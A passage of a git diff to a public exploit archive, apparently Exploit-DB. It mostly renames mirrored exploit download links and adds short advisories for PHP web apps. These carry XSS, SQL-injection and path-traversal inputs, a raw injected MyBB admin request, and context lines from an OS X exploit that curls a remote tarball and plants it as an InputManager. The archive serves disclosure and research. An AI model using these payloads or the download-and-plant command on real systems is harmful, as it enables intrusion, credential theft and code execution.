+https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18619.zip (tomcat-remote.zip) \ No newline at end of file diff --git a/platforms/multiple/remote/349.txt b/platforms/multiple/remote/349.txt index 66c07a76b..3a9d1cc18 100755 --- a/platforms/multiple/remote/349.txt +++ b/platforms/multiple/remote/349.txt @@ -1,3 +1,3 @@ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/x2.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/349.tgz (x2.tgz) # milw0rm.com [2002-05-01] diff --git a/platforms/multiple/remote/4877.txt b/platforms/multiple/remote/4877.txt index 7f45db1d9..884639654 100755 --- a/platforms/multiple/remote/4877.txt +++ b/platforms/multiple/remote/4877.txt @@ -70,7 +70,7 @@ vulnerability are in the fantasy of the attacker... http://aluigi.org/poc/sapone.zip -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-sapone.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4877.zip (2008-sapone.zip) ####################################################################### diff --git a/platforms/multiple/remote/5622.txt b/platforms/multiple/remote/5622.txt index 0746ca8bc..ca01f6fbe 100755 --- a/platforms/multiple/remote/5622.txt +++ b/platforms/multiple/remote/5622.txt @@ -12,7 +12,7 @@ On an unpatched system, which doesn't need to be debian, do the following: keys provided by HD Moore - http://metasploit.com/users/hdm/tools/debian-openssl/ 1. Download http://sugar.metasploit.com/debian_ssh_rsa_2048_x86.tar.bz2 - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2 + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) 2. Extract it to a directory diff --git a/platforms/multiple/remote/5632.rb b/platforms/multiple/remote/5632.rb index 66019cc86..cd287d727 100755 --- a/platforms/multiple/remote/5632.rb +++ b/platforms/multiple/remote/5632.rb @@ -13,8 +13,8 @@ # # Common Keys: # -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_dsa_1024_x86.tar.bz2 -# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/debian_ssh_rsa_2048_x86.tar.bz2 +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5632.tar.bz2 (debian_ssh_dsa_1024_x86.tar.bz2) +# https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5622.tar.bz2 (debian_ssh_rsa_2048_x86.tar.bz2) # # # Usage: diff --git a/platforms/multiple/remote/5790.txt b/platforms/multiple/remote/5790.txt index b6c5fffa1..0970abeeb 100755 --- a/platforms/multiple/remote/5790.txt +++ b/platforms/multiple/remote/5790.txt @@ -9,6 +9,6 @@ # # ############################################################################# -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-snmpv3_exp.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/5790.tgz (2008-snmpv3_exp.tgz) # milw0rm.com [2008-06-12] diff --git a/platforms/multiple/remote/6236.txt b/platforms/multiple/remote/6236.txt index 2ac9b0f28..ea516bd34 100755 --- a/platforms/multiple/remote/6236.txt +++ b/platforms/multiple/remote/6236.txt @@ -36,6 +36,6 @@ So, if you have a GigE lan, any trojaned machine can poison your DNS during one original source: http://tservice.net.ru/~s0mbre/blog/2008/08/08/ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-dns-bind.tgz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/6236.tgz (2008-dns-bind.tgz) # milw0rm.com [2008-08-13] diff --git a/platforms/multiple/webapps/11184.txt b/platforms/multiple/webapps/11184.txt index 7cc4ae418..89ae185ed 100755 --- a/platforms/multiple/webapps/11184.txt +++ b/platforms/multiple/webapps/11184.txt @@ -87,4 +87,4 @@ For more information, please visit www.cybsec.com ====================================================== Download: ====================================================== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11184.pdf (CYBSEC-Advisory2010-0102-FreePBX_2_5_x-2_6_Permanent_XSS.pdf) \ No newline at end of file diff --git a/platforms/multiple/webapps/11186.txt b/platforms/multiple/webapps/11186.txt index 1ee5a25da..c760b2c20 100755 --- a/platforms/multiple/webapps/11186.txt +++ b/platforms/multiple/webapps/11186.txt @@ -94,4 +94,4 @@ For more information, please visit www.cybsec.com =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11186.pdf (CYBSEC-Advisory2010-0103-FreePBX_2_5_1_SQL_Injection.pdf) \ No newline at end of file diff --git a/platforms/multiple/webapps/11187.txt b/platforms/multiple/webapps/11187.txt index 03341f671..2fd14f904 100755 --- a/platforms/multiple/webapps/11187.txt +++ b/platforms/multiple/webapps/11187.txt @@ -85,4 +85,4 @@ For more information, please visit www.cybsec.com =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11187.pdf (CYBSEC-Advisory2010-0101-FreePBX_2_5_x_Information_disclosure.pdf) \ No newline at end of file diff --git a/platforms/multiple/webapps/11211.txt b/platforms/multiple/webapps/11211.txt index 2b6e6ca48..73eaf7cca 100755 --- a/platforms/multiple/webapps/11211.txt +++ b/platforms/multiple/webapps/11211.txt @@ -148,4 +148,4 @@ the world. =========================================== The PDF version can be downloaded here: =========================================== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cpanel_http_response_splitting_vulnerability.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/11211.pdf (cpanel_http_response_splitting_vulnerability.pdf) \ No newline at end of file diff --git a/platforms/multiple/webapps/14001.txt b/platforms/multiple/webapps/14001.txt index 84b61e402..f317f8990 100755 --- a/platforms/multiple/webapps/14001.txt +++ b/platforms/multiple/webapps/14001.txt @@ -16,4 +16,4 @@ parameter “pkg_name” Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14001.pdf (cybsec_advisory_2010_0606_InterScan_Web_Security_5_0_Arbitrary_File_Download.pdf) \ No newline at end of file diff --git a/platforms/multiple/webapps/14004.txt b/platforms/multiple/webapps/14004.txt index fccb42558..f092d9045 100755 --- a/platforms/multiple/webapps/14004.txt +++ b/platforms/multiple/webapps/14004.txt @@ -14,4 +14,4 @@ Reference to Vulnerability Disclosure Policy: http://www.cybsec.com/vulnerabilit Vulnerability Description: InterScan Web Security Virtual Appliance has a shell called “uihelper” that has suid bit on. So it could be possible to execute commands as root. Also using the vulnerability “Arbitrary File Upload” remote commands could be run as root. -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14004.pdf (cybsec_advisory_2010_0604_InterScan_Web_Security_5_0_Local_Privilege_Escalation.pdf) diff --git a/platforms/multiple/webapps/17393.txt b/platforms/multiple/webapps/17393.txt index a20386c45..977d7b67a 100755 --- a/platforms/multiple/webapps/17393.txt +++ b/platforms/multiple/webapps/17393.txt @@ -69,4 +69,4 @@ Oracle Application Server 10g Release 3 (10.1.3.1.0) Overview of Oracle HTTP Ser http://xss.cx/http-header-injection-expect-response-splitting-cI-113-example-poc.aspx http://www.cvedetails.com/vulnerability-list/vendor_id-93/product_id-707/opxss-1/Oracle-Application-Server.html -PDF Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/XSS_Header_Injection_in_OHS_by_Yasser.pdf \ No newline at end of file +PDF Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17393.pdf (XSS_Header_Injection_in_OHS_by_Yasser.pdf) \ No newline at end of file diff --git a/platforms/osx/dos/17567.txt b/platforms/osx/dos/17567.txt index cf9645e8d..8206038e3 100755 --- a/platforms/osx/dos/17567.txt +++ b/platforms/osx/dos/17567.txt @@ -9,5 +9,5 @@ # Status : Patched */ -PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/CVE-2011-0222.zip +PoC: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17567.zip (CVE-2011-0222.zip) diff --git a/platforms/osx/local/3181.rb b/platforms/osx/local/3181.rb index 5a02ecde5..587042a48 100755 --- a/platforms/osx/local/3181.rb +++ b/platforms/osx/local/3181.rb @@ -12,7 +12,7 @@ bugselected = (ARGV[0] || 0).to_i # INPUTMANAGER_URL = "http://projects.info-pull.com/moab/bug-files/MOAB-22-01-2007_im.tar.gz" # keeping a local backup. /str0ke -INPUTMANAGER_URL = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/MOAB-22-01-2007_im.tar.gz" +INPUTMANAGER_URL = "https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3181.tar.gz" INPUTMANAGER_PLANT = "/usr/bin/curl -o /tmp/moab_im.tar.gz #{INPUTMANAGER_URL};" + "mkdir -p ~/Library/InputManagers/;" + "cd ~/Library/InputManagers/;" + diff --git a/platforms/osx/local/3985.txt b/platforms/osx/local/3985.txt index 0a55f6a9a..563cab926 100755 --- a/platforms/osx/local/3985.txt +++ b/platforms/osx/local/3985.txt @@ -1,5 +1,5 @@ Mac OS X <= 10.4.8 pppd Plugin Loading Privilege Escalation Exploit -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05252007-osxpppd.tar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/3985.tar (05252007-osxpppd.tar) # milw0rm.com [2007-05-25] diff --git a/platforms/osx/local/4013.txt b/platforms/osx/local/4013.txt index 4ddf0dfe2..9bf9ef040 100755 --- a/platforms/osx/local/4013.txt +++ b/platforms/osx/local/4013.txt @@ -2,6 +2,6 @@ # # CVE-ID: CVE-2007-0753 - http://docs.info.apple.com/article.html?artnum=305530 -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/05302007-vpenis.tar.gz +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4013.tar.gz (05302007-vpenis.tar.gz) # milw0rm.com [2007-05-30] diff --git a/platforms/osx/remote/8753.txt b/platforms/osx/remote/8753.txt index 9de80cc46..3905f1a9c 100755 --- a/platforms/osx/remote/8753.txt +++ b/platforms/osx/remote/8753.txt @@ -42,6 +42,6 @@ systems. http://landonf.bikemonkey.org/static/moab-tests/CVE-2008-5353/hello.html -compiled/decompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2009-javax.tgz +compiled/decompiled: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/8753.tgz (2009-javax.tgz) # milw0rm.com [2009-05-20] diff --git a/platforms/osx/shellcode/17564.asm b/platforms/osx/shellcode/17564.asm index 836d12237..d5d4664eb 100755 --- a/platforms/osx/shellcode/17564.asm +++ b/platforms/osx/shellcode/17564.asm @@ -200,4 +200,4 @@ _main: ret ; see http://t.co/nIrRbn5 for a detailed explanation -; full package mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/osx.rop.24072011.tgz \ No newline at end of file +; full package mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17564.tgz (osx.rop.24072011.tgz) \ No newline at end of file diff --git a/platforms/php/dos/14678.zip b/platforms/php/dos/14678.zip index 13fe4b8a4..5df5af671 100755 --- a/platforms/php/dos/14678.zip +++ b/platforms/php/dos/14678.zip @@ -49,4 +49,4 @@ FROM rdb$database", generator, inc); =========================================================================== Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/ibase_gen_id_poc.zip \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/14678.zip (ibase_gen_id_poc.zip) \ No newline at end of file diff --git a/platforms/php/dos/18296.txt b/platforms/php/dos/18296.txt index 344d66db8..d01790284 100755 --- a/platforms/php/dos/18296.txt +++ b/platforms/php/dos/18296.txt @@ -20,7 +20,7 @@ Original version by itz me (opensc.ws) CVE-2011-4885 Mirrors List: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/hashcollide.txt +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/18296.txt (hashcollide.txt) http://compsoc.nuigalway.ie/~infodox/hashcollide.txt http://jrs-s.net/hashcollide.txt http://www.infodox.co.cc/Downloads/hashcollide.txt diff --git a/platforms/php/webapps/12338.txt b/platforms/php/webapps/12338.txt index a5bd831c4..85226f387 100755 --- a/platforms/php/webapps/12338.txt +++ b/platforms/php/webapps/12338.txt @@ -21,7 +21,7 @@ export_item_id=18 and 1=1&include_deps=on&output_format=3&export_type=graph_temp =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Bonsai-SQL_Injection_in_Cacti.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12338.pdf (Bonsai-SQL_Injection_in_Cacti.pdf) diff --git a/platforms/php/webapps/12339.txt b/platforms/php/webapps/12339.txt index 7a764e581..4218aaed0 100755 --- a/platforms/php/webapps/12339.txt +++ b/platforms/php/webapps/12339.txt @@ -19,7 +19,7 @@ Note that other properties of a Graph Template might also be affected. =========================================================================== Download: =========================================================================== -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/Bonsai-OS_Command_Injection_in_Cacti.pdf +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12339.pdf (Bonsai-OS_Command_Injection_in_Cacti.pdf) diff --git a/platforms/php/webapps/12617.txt b/platforms/php/webapps/12617.txt index 64d3fe962..9e9496408 100755 --- a/platforms/php/webapps/12617.txt +++ b/platforms/php/webapps/12617.txt @@ -27,5 +27,5 @@ Test Environment: ==================================================================== Download the following file for more instructions and exploits: -Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/file_thingie_v255_Jeremiah.zip +Exploit-DB mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/12617.zip (file_thingie_v255_Jeremiah.zip) ==================================================================== \ No newline at end of file diff --git a/platforms/php/webapps/13776.txt b/platforms/php/webapps/13776.txt index 4767722c4..849e29b13 100755 --- a/platforms/php/webapps/13776.txt +++ b/platforms/php/webapps/13776.txt @@ -16,4 +16,4 @@ user who is able to add or modify Vendors, Customers, Employees or Inventary ite Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13776.pdf (cybsec_advisory_2010_0603_Phreebooks_v2_0_Multiple_Permanent_Cross_site_Scripting.pdf) \ No newline at end of file diff --git a/platforms/php/webapps/13777.txt b/platforms/php/webapps/13777.txt index 404c32d99..0d6426bed 100755 --- a/platforms/php/webapps/13777.txt +++ b/platforms/php/webapps/13777.txt @@ -17,4 +17,4 @@ The files are included into the scripts and its contents executed by the server. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13777.pdf (cybsec_advisory_2010_0602_Phreebooks_v2_0_Local_File_Inclusion.pdf) \ No newline at end of file diff --git a/platforms/php/webapps/13778.txt b/platforms/php/webapps/13778.txt index 33acd30d8..bf9a01b14 100755 --- a/platforms/php/webapps/13778.txt +++ b/platforms/php/webapps/13778.txt @@ -16,4 +16,4 @@ move up to root directory, thus permitting navigation through the file system. Download: -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf \ No newline at end of file +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/13778.pdf (cybsec_advisory_2010_0601_Phreebooks_v2_0_Directory_Traversal.pdf) \ No newline at end of file diff --git a/platforms/php/webapps/17309.txt b/platforms/php/webapps/17309.txt index dd762a614..fdd66522c 100755 --- a/platforms/php/webapps/17309.txt +++ b/platforms/php/webapps/17309.txt @@ -29,7 +29,7 @@ the MP3 file format provided with the standard PHPCaptcha package available from www.phpcaptcha.org is available at: http://www.senseofsecurity.com.au/advisories/SOS-11-007.zip -Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/SOS-11-007.zip +Mirror: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/17309.zip (SOS-11-007.zip) Proof of concept code is only available for the MP3 version of the audio, however the WAV audio format is also affected by the same diff --git a/platforms/php/webapps/37008.txt b/platforms/php/webapps/37008.txt new file mode 100755 index 000000000..c3ab0e45f --- /dev/null +++ b/platforms/php/webapps/37008.txt @@ -0,0 +1,7 @@ +source: http://www.securityfocus.com/bid/52701/info + +Event Calendar PHP is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +http://www.example.com/demo_eventcalendar.php?cal_id=1&cal_month=2&cal_year=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37010.txt b/platforms/php/webapps/37010.txt new file mode 100755 index 000000000..5fef243f6 --- /dev/null +++ b/platforms/php/webapps/37010.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52720/info + +FbiLike is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +FbiLike 1.00 is vulnerable; other versions may also be affected. + +http://www.example.com/fbilike/like.php?id=[XSS] \ No newline at end of file diff --git a/platforms/php/webapps/37011.txt b/platforms/php/webapps/37011.txt new file mode 100755 index 000000000..48824cb62 --- /dev/null +++ b/platforms/php/webapps/37011.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52725/info + +Geeklog is prone to an SQL-injection vulnerability because it fails to sufficiently sanitize user-supplied data before using it in an SQL query. + +Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +Geeklog 1.8.1 is vulnerable; other versions may also be affected. + +http://www.example.com/easyfile/index.php?folder=(SQLI) \ No newline at end of file diff --git a/platforms/php/webapps/37012.txt b/platforms/php/webapps/37012.txt new file mode 100755 index 000000000..328dab3a3 --- /dev/null +++ b/platforms/php/webapps/37012.txt @@ -0,0 +1,11 @@ +source: http://www.securityfocus.com/bid/52728/info + +NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system. + +NextBBS 0.6.0 is vulnerable; other versions may also be affected. + +http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=findusers&curstr=war%2527axe +http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=isidavailable&id=war%2527axe +http://www.example.com/nextbbs.0.6.0/?do=ajaxserver&action=getgreetings&username=war%2527axe \ No newline at end of file diff --git a/platforms/php/webapps/37013.txt b/platforms/php/webapps/37013.txt new file mode 100755 index 000000000..5624b9cf6 --- /dev/null +++ b/platforms/php/webapps/37013.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52728/info + +NextBBS is prone to multiple SQL-injection vulnerabilities, a cross-site scripting vulnerability, and an authentication-bypass vulnerability. + +Exploiting these vulnerabilities could allow an attacker to steal cookie-based authentication credentials, compromise the application, access or modify data, exploit latent vulnerabilities in the underlying database, and bypass the authentication process to gain unauthorized access to the system. + +NextBBS 0.6.0 is vulnerable; other versions may also be affected. + +http://www.example.com/nextbbs.0.6.0/index.php?do= \ No newline at end of file diff --git a/platforms/php/webapps/37016.txt b/platforms/php/webapps/37016.txt new file mode 100755 index 000000000..0b32410e6 --- /dev/null +++ b/platforms/php/webapps/37016.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52739/info + +WordPress Integrator is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +WordPress Integrator 1.32 is vulnerable; other versions may also be affected. + +http://www.example.com/wordpress/wp-login.php?redirect_to=http://%3F1 \ No newline at end of file diff --git a/platforms/php/webapps/37017.txt b/platforms/php/webapps/37017.txt new file mode 100755 index 000000000..5bdf2f89f --- /dev/null +++ b/platforms/php/webapps/37017.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52740/info + +Invision Power Board is prone to a cross-site scripting vulnerability because it fails to sanitize user-supplied input. + +An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and launch other attacks. + +Invision Power Board 4.2.1 is vulnerable; other versions may also be affected. + +http://www.example.com/index.php?s=blablabla&&app=gallery&module=ajax§ion=albumSelector&do=albumSelectorPane&secure_key=blalblabla&type=upload&albums=search&moderate=&album_id=1593&member_id=&searchType=member&searchMatch=is&searchIsGlobal=0&searchSort=date&searchDir=desc&searchText=%27%22--%3E%3C%2Fstyle%3E%3C%2Fscript%3E%3Cscript%3Ealert%280x000252%29%3C%2Fscript%3E \ No newline at end of file diff --git a/platforms/php/webapps/37018.txt b/platforms/php/webapps/37018.txt new file mode 100755 index 000000000..be6a18cae --- /dev/null +++ b/platforms/php/webapps/37018.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/52743/info + +MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. + +Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +MyBB 1.6.6 is vulnerable; other versions may also be affected. + +POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1 +Host: 192.168.7.5 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip, deflate +Proxy-Connection: keep-alive +Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search +Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1; +adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM; +sid=d725ac10b7d8f0f8765dfa73f5dcf23b +Content-Type: application/x-www-form-urlencoded +Content-Length: 638 + +my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya +&conditions%5Busergroup%5D%5B%5D=2'&conditions%5Bwebsite%5D=&conditions%5Bicq%5D=&conditions%5Baim%5D= +&conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D= +&conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D= +&conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA +&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card \ No newline at end of file diff --git a/platforms/php/webapps/37019.txt b/platforms/php/webapps/37019.txt new file mode 100755 index 000000000..5d2282952 --- /dev/null +++ b/platforms/php/webapps/37019.txt @@ -0,0 +1,28 @@ +source: http://www.securityfocus.com/bid/52743/info + +MyBB is prone to an SQL-injection vulnerability and a cross-site scripting vulnerability. + +Exploiting these vulnerabilities could allow an attacker to execute arbitrary script code, steal cookie-based authentication credentials, compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database. + +MyBB 1.6.6 is vulnerable; other versions may also be affected. + +POST /mybb/admin/index.php?module=user-users&action=search HTTP/1.1 +Host: 192.168.7.5 +User-Agent: Mozilla/5.0 (Windows NT 6.1; rv:10.0) Gecko/20100101 Firefox/10.0 +Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8 +Accept-Language: en-us,en;q=0.5 +Accept-Encoding: gzip, deflate +Proxy-Connection: keep-alive +Referer: http://192.168.7.5/mybb/admin/index.php?module=user-users&action=search +Cookie: mybb[lastvisit]=1332694756; mybb[lastactive]=1332699650; mybb[referrer]=1; loginattempts=1; +adminsid=a82d27dd72efdb0a99c009db7701e847; acploginattempts=0; mybbuser=1_CAo7pz2wUvHGtlJht9OLGyXG8ZVbS78xAXx6ZTzBrvNSe5S2GM; +sid=d725ac10b7d8f0f8765dfa73f5dcf23b +Content-Type: application/x-www-form-urlencoded +Content-Length: 638 + +my_post_key=5dbe489b5b03d9d9e2d387ff9267567d&conditions%5Busername%5D=aditya&conditions%5Bemail%5D=aditya +&conditions%5Busergroup%5D%5B%5D=2&conditions%5Bwebsite%5D=&conditions%5Bicq%5D= +&conditions%5Baim%5D=&conditions%5Byahoo%5D=&conditions%5Bmsn%5D=&conditions%5Bsignature%5D=&conditions%5Busertitle%5D= +&conditions%5Bpostnum_dir%5D=greater_than&conditions%5Bpostnum%5D=&conditions%5Bregdate%5D= +&conditions%5Bregip%5D=&conditions%5Blastip%5D=&conditions%5Bpostip%5D=&profile_fields%5Bfid3%5D%5Bfid3%5D=N%2FA +&profile_fields%5Bfid1%5D=&profile_fields%5Bfid2%5D=&sortby=username&order=asc&perpage=&displayas=card diff --git a/platforms/php/webapps/37021.txt b/platforms/php/webapps/37021.txt new file mode 100755 index 000000000..239be8dc6 --- /dev/null +++ b/platforms/php/webapps/37021.txt @@ -0,0 +1,9 @@ +source: http://www.securityfocus.com/bid/52766/info + +TomatoCart is prone to a local file-include vulnerability because it fails to sufficiently sanitize user-supplied input. + +An attacker can exploit this vulnerability to obtain potentially sensitive information and to execute arbitrary local scripts in the context of the Web server process. This may allow the attacker to compromise the application and the computer; other attacks are also possible. + +TomatoCart 1.2.0 Alpha 2 is vulnerable; other versions may also be affected. + +http://www.example.com/json.php?action=3&module=../../../../../../../../../../../../../../boot.ini%00 \ No newline at end of file diff --git a/platforms/php/webapps/4059.txt b/platforms/php/webapps/4059.txt index 607a91f4a..b7e36f87c 100755 --- a/platforms/php/webapps/4059.txt +++ b/platforms/php/webapps/4059.txt @@ -106,6 +106,6 @@ Submit download the netcat+exploit from my server: http://corryl.altervista.org/index.php?mod=Download/Exploit#exploit-LRCF-v3.4.rar -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/06112007-exploit-LRCF-v3.4.rar +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4059.rar (06112007-exploit-LRCF-v3.4.rar) # milw0rm.com [2007-06-11] diff --git a/platforms/php/webapps/4841.txt b/platforms/php/webapps/4841.txt index 3ac3675b1..32ccf13b0 100755 --- a/platforms/php/webapps/4841.txt +++ b/platforms/php/webapps/4841.txt @@ -86,7 +86,7 @@ www.underwater.itdefence.ru/isniff.rar - https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-isniff.rar + https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/4841.rar (2008-isniff.rar) ----[ FROM RUSSIA WITH LOVE :: underWHAT?! , gemaglabin ] OSVDB: 51280, 51281 diff --git a/platforms/php/webapps/697.c b/platforms/php/webapps/697.c index 761040c7d..9616b4a28 100755 --- a/platforms/php/webapps/697.c +++ b/platforms/php/webapps/697.c @@ -1,4 +1,4 @@ -// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/phpbbmemorydump.rar +// Compiled version: https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/697.rar (phpbbmemorydump.rar) // Source serv.cpp is at the bottom of the page - str0ke // Notes from author: diff --git a/platforms/php/webapps/7421.txt b/platforms/php/webapps/7421.txt index 55ddc3dfd..25ccb3108 100755 --- a/platforms/php/webapps/7421.txt +++ b/platforms/php/webapps/7421.txt @@ -21,6 +21,6 @@ [+] For OS Commanding executing go to: http://127.0.0.1/ezinfo/about?cmd= */ -https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/2008-eZPublish_abuse_of_functionality_zero_day.zip +https://github.com/offensive-security/exploit-database-bin-sploits/raw/master/sploits/7421.zip (2008-eZPublish_abuse_of_functionality_zero_day.zip) # milw0rm.com [2008-12-11] diff --git a/platforms/solaris/remote/5282.txt b/platforms/solaris/remote/5282.txt index 1d9621a5e..e2aa2ae0d 100755 --- a/platforms/solaris/remote/5282.txt +++ b/platforms/solaris/remote/5282.txt @@ -1,5 +1,5 @@ Sun Solaris <= 10 rpc.ypupdated Remote Root Exploit 